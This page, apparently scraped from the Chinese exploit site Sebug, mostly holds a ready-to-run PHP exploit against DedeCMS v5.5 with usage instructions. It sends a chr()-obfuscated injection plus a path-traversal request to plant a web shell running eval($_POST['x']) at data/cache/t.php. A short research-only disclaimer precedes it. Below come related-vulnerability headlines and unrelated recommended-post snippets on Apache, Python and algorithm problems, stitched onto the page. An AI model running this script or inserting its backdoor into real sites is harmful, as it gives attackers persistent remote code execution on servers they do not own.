测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    21. $host = $argv[1];
    22. $path = $argv[2];
    23. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    24. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    25. $shell ='data/cache/t.php';
    26. get_send($post_a);
    27. post_send('plus/comments_frame.php',$post_b);
    28. $content = post_send($shell,'t=echo tojen;');
    29. if(substr($content,9,3)=='200'){
    30. echo "\nShell Address is:".$host.$path.$shell;
    31. }else{
    32. echo "\nError.";
    33. }
    34. function get_send($url){
    35. global $host, $path;
    36. $message ="GET ".$path."$url HTTP/1.1\r\n";
    37. $message .="Accept: */*\r\n";
    38. $message .="Referer: http://$host$path\r\n";
    39. $message .="Accept-Language: zh-cn\r\n";
    40. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    41. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    42. $message .="Host: $host\r\n";
    43. $message .="Connection: Close\r\n\r\n";
    44. $fp = fsockopen($host,80);
    45. if(!$fp){
    46. echo "\nConnect to host Error";
    47. }
    48. fputs($fp, $message);
    49. $back ='';
    50. while(!feof($fp))
    51. $back .= fread($fp,1024);
    52. fclose($fp);
    53. return $back;
    54. }
    55. function post_send($url,$cmd){
    56. global $host, $path;
    57. $message ="POST ".$path."$url HTTP/1.1\r\n";
    58. $message .="Accept: */*\r\n";
    59. $message .="Referer: http://$host$path\r\n";
    60. $message .="Accept-Language: zh-cn\r\n";
    61. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    62. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    63. $message .="Host: $host\r\n";
    64. $message .="Content-Length: ".strlen($cmd)."\r\n";
    65. $message .="Connection: Close\r\n\r\n";
    66. $message .= $cmd;
    67. $fp = fsockopen($host,80);
    68. if(!$fp){
    69. echo "\nConnect to host Error";
    70. }
    71. fputs($fp, $message);
    72. $back ='';
    73. while(!feof($fp))
    74. $back .= fread($fp,1024);
    75. fclose($fp);
    76. return $back;
    77. }
    78. ?>

dedecms v5.5 final getwebshell exploit(datalistcp.class.php)的更多相关文章

  1. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  2. DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

    漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为 ...

  3. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  4. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  5. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  6. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  7. DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)

    DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2版本中的 ...

  8. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  9. DeDeCMS v5.7 漏洞复现

    DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pik ...

随机推荐

  1. Apache配置实现日志按天分割并删除指定几天前的日志

    Apache日志默认情况下是一周切割一次,由于访问量大的时候日志的文件还是比较大的,同时也不利于管理员对日志的分析处理.于是尝试对Apache日志设置按天分割,并通过计划任务执行删除几天的日志. 配置 ...

  2. HttpServletRequest继承字ServletRequest的常用方法

    //获取请求的完整路径String origUrl = req.getRequestURL().toString(); //获取查询的参数String queryStr = req.getQueryS ...

  3. Python并发编程-进程间数据共享

    Manager中进程数据不安全 通过加锁解决 from multiprocessing import Manager,Process,Lock def main(dic,lock): lock.acq ...

  4. Python的扩展接口[3] -> Matlab引擎 -> 使用 Python 调用 Matlab 程序

    Python - Matlab 目录 Python-Matlab 引擎 Python-Matlab 数组 Python-Matlab 基本操作 Python-Matlab 调用 m 文件 Matlab ...

  5. 【SQL】175. Combine Two Tables

    Table: Person +-------------+---------+ | Column Name | Type | +-------------+---------+ | PersonId ...

  6. Xcode代码提示里的字母含义

    P -- 协议 M -- 成员方法 C -- 类 K -- 枚举 .常量 V -- 成员变量 T -- typedef类型 G -- 全局变量 f -- 函数 # -- #define指令

  7. POJ 1222【异或高斯消元|二进制状态枚举】

    题目链接:[http://poj.org/problem?id=1222] 题意:Light Out,给出一个5 * 6的0,1矩阵,0表示灯熄灭,反之为灯亮.输出一种方案,使得所有的等都被熄灭. 题 ...

  8. HNOI2012永无乡

    fhq treap+启发式合并,将小的合并到大的上面,复杂度NlogN. 最好的一点是通过dfs将一个子树内的元素转到另一个元素上. By:大奕哥 #include<bits/stdc++.h& ...

  9. [SDOI2017]数字表格 --- 套路反演

    [SDOI2017]数字表格 由于使用markdown的关系 我无法很好的掌控格式,见谅 对于这么简单的一道题竟然能在洛谷混到黑,我感到无语 \[\begin{align*} \prod\limits ...

  10. [洛谷P3987]我永远喜欢珂朵莉~

    [洛谷P3987]我永远喜欢珂朵莉~ 题目大意: 给你\(n(n\le10^5)\)个数\(A_{1\sim n}(A_i\le5\times10^5)\),\(m(m\le5\times10^5)\ ...